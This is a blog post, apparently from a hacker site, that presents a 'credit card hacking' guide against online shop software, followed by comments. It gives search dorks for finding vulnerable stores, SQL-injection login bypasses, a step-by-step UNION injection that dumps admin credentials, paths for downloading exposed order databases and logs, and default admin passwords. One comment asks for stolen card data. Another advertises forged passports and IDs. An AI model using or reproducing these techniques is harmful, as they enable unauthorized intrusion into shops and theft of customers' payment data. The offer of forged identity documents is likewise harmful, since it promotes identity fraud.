> > Best Credit Card Hacking Method

Best Credit Card Hacking Method

Facebook Page :- www.facebook.com/ExPLOiTInc
Yahoo :- joeroot.exploit_inc@yahoo.com

Most of these are outdated but they can still work if you happen to find a vulnerable site:

google dork :--> inurl:"/cart.php?m="
target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or"="
Password : 'or"=

google dork :--> allinurlroddetail.asp?prod=
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb

google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.co....dd=action&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.....late=order.log

google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb

google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
Keyword=&category=5); update tbluser set fldpassword='' where
Keyword=&category=3); update tbluser set fldaccess='1' where
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where

login page: http://xxxxxxx/vpasp/shopadmin.asp

google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
after finding user and pass go to login page:

google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
user : 'or'1
pass : 'or'1

google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.co....short_blue.htm
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.c....iles/order.log

google.com:--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb

google.com:--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt

google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.

google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log

google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
after dl the db look at access for user and password

1/search google: allinurl:"shopdisplayproducts.asp?id=

2/find error by adding '

--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467

-If you don't see error then change id to cat


3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password

--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password

--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......

4/ add 2,3,4,5,6.......until you see a nice table

add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password

...5,6,7,8,9.... untill you see a table. (exp:...47)

---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.

5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password

6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp

Didn't work? then u have to find yourself:

add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

you'll see something like: ( lot of them)


then guess admin link by adding the above data untill you find admin links

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
if you didn't download the Database..
Try this while there is dblocation.

the url will be:
If u see the error message you have to try this :

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com

inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
Username: vpasp
password: vpasp


  1. sorry to bother u but ive been trying this for days and cant seem to understand it i wanna obtain a few cc info to shop online but i have no success ive even tried buying online but was scammed twice u sound like da real deal cause i doubt no one selling cc will give away thier secret can u please help me out with cc info please or educate me a little on obtaining dem id appreciate it tamara.69@live.com

  2. Get Real & Authentic / Fake Documents like passports, visa, ID cards, Driver's license etc

    Guaranteed passport, citizenship, Id cards, driver's license, diplomas, degrees, certificates service available. Tourist and business visa services available to residents of all 50 states and all nationalities Worldwide. Unique producers of Authentic High Quality passports, Real Genuine Data Base Registered and unregistered Passports and other Citizenship documents. I can guarantee you a new Identity starting from a clean new genuine Birth Certificate, ID card, Drivers License, Passports, Social security card with SSN, credit files, and credit cards, school diplomas, school degrees all in an entirely new name issued and registered in the government database system..


    Contact e-mails:=== whodat2010.2020@gmail.com
    Contact Number:=== *********
    Skype Name:==== jamison.ken


Powered by Blogger.